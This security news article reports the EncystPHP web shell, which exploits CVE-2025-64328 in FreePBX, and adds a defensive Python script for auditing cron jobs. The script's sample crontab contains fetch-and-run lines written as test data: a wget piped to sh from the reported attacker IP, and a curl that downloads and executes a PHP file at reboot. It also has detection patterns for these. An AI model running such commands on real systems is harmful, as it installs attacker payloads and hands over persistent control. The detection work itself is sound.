securityonline.info 2/2/2026, 1:40:45 AM · via preferred

Silent Intruder: “EncystPHP” Web Shell Burrows into FreePBX Systems

CyberSIXT evidence panel: CISA KEV status: listed in KEV; patch status: unknown.

FortiGuard Labs has named a web shell it calls EncystPHP: a sophisticated piece of malware that targets FreePBX environments by exploiting a post-authentication command-injection vulnerability, CVE-2025-64328, to establish a persistent backdoor. The attacks began in early December, and the campaign is described as using a web shell capable of remote command execution, persistence, and deployment of the shell itself.

The activity is linked to the hacker group INJ3CTOR3, according to FortiGuard Labs, which has a history of targeting VoIP systems. In one documented case, the exploit originated in Brazil and affected an Indian technology company specialising in cloud and communication services, with Cron-style persistence using wget to download scripts from an external IP (45.234.176[.]202).

EncystPHP is designed to blend in by mimicking legitimate FreePBX components, allowing it to evade detection while giving attackers control over the victim system. Administrators are urged to patch any PBX systems that are still unpatched and to audit for EncystPHP shells or unauthorized cron jobs, as the incident underscores ongoing exploitation of CVE-2025-64328.
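The audit the article recommends for unauthorized cron jobs can be scripted. The following is an added example, not code from the article or from FortiGuard Labs: it scans crontab text for entries that pull content from a remote host with wget or curl (the persistence pattern described above) and flags any entry that contacts the IP the article reports. The sample crontab lines are constructed for illustration; only the 45.234.176[.]202 address comes from the article, and the other host, file names and schedules are hypothetical.

```python
import glob
import os
import re
from dataclasses import dataclass
from typing import List, Set

# Constructed sample crontab (hypothetical lines; only the 45.234.176.202
# address is the indicator reported in the article).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/fwconsole ma upgradeall
*/5 * * * * wget -q -O - http://45.234.176.202/x.sh | sh
@reboot curl -s http://203.0.113.10/persist.php -o /tmp/.p && php /tmp/.p
30 1 * * 0 /usr/bin/find /var/log/asterisk -mtime +30 -delete
"""

# Indicator from the article; extend with your own threat-intel feed.
KNOWN_BAD_HOSTS: Set[str] = {"45.234.176.202"}

DOWNLOADER_RE = re.compile(r"\b(wget|curl)\b")
URL_RE = re.compile(r"https?://([^/\s:]+)")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sh|bash|dash)\b")


@dataclass
class Finding:
    line_no: int
    line: str
    reason: str


def audit_crontab(text: str, known_bad_hosts: Set[str] = KNOWN_BAD_HOSTS) -> List[Finding]:
    """Return one Finding per suspicious cron entry in `text`.

    An entry is suspicious when it fetches a URL from a known-bad host, or when
    it invokes a downloader against any remote URL (cron jobs on a PBX normally
    run local maintenance, not remote fetches). Piping the download straight
    into a shell is noted in the reason because it is the classic dropper shape.
    """
    findings: List[Finding] = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and comments carry no command
        hosts = URL_RE.findall(line)
        bad = [h for h in hosts if h in known_bad_hosts]
        if bad:
            reason = f"known-bad host {bad[0]}"
        elif DOWNLOADER_RE.search(line) and hosts:
            reason = f"downloader fetching remote content from {hosts[0]}"
        else:
            continue
        if PIPE_TO_SHELL_RE.search(line):
            reason += "; output piped to a shell"
        findings.append(Finding(no, line, reason))
    return findings


def audit_system_cron() -> List[Finding]:
    """Audit the system-wide cron files on this host (assumed standard paths)."""
    findings: List[Finding] = []
    for path in ["/etc/crontab"] + sorted(glob.glob("/etc/cron.d/*")):
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                for f in audit_crontab(fh.read()):
                    findings.append(Finding(f.line_no, f"{path}: {f.line}", f.reason))
    return findings


if __name__ == "__main__":
    # Run against the constructed sample, then against the live host if any
    # system cron files exist.
    for f in audit_crontab(SAMPLE_CRONTAB) + audit_system_cron():
        print(f"line {f.line_no}: {f.reason}\n    {f.line}")
```

Per-user crontabs (`crontab -l -u <user>`) and `/etc/cron.{hourly,daily,weekly}` scripts are not covered by this snippet; feed their contents to `audit_crontab` the same way, and treat any hit as a lead for a wider look at the web root rather than as a final verdict.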


Article by CyberSIXT
